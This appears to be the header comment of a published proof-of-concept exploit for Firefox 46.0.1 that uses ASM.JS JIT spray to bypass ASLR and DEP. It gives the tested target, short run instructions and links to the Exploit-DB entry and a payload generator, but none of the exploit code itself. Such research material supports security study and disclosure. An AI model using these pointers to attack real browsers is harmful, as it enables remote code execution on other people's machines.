<!-- FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375) *PoC* Exploit against Firefox 46.0.1 (CVE-2016-2819) ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018 Tested on: Firefox 46.0.1 32-bit - Windows 10 1709 https://ftp.mozilla.org/pub/firefox/releases/46.0.1/win32/en-US/Firefox%20Setup%2046.0.1.exe Howto: 1) serve PoC over network and open it in Firefox 46.0.1 32-bit 2) A successfull exploit attempt should pop calc.exe Mozilla Bug Report: https://bugzilla.mozilla.org/show_bug.cgi?id=1270381 Writeup: https://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/ - For research purposes only - (C) Rh0 Mar. 13, 2018
Reference :
Firefox 46.0.1 – ASM.JS JIT-Spray Remote Code Execution
https://www.exploit-db.com/exploits/44293/
shellcode2asmjs: Generate arbitrary ASM.JS JIT-Spray payloads
https://github.com/rh0dev/shellcode2asmjs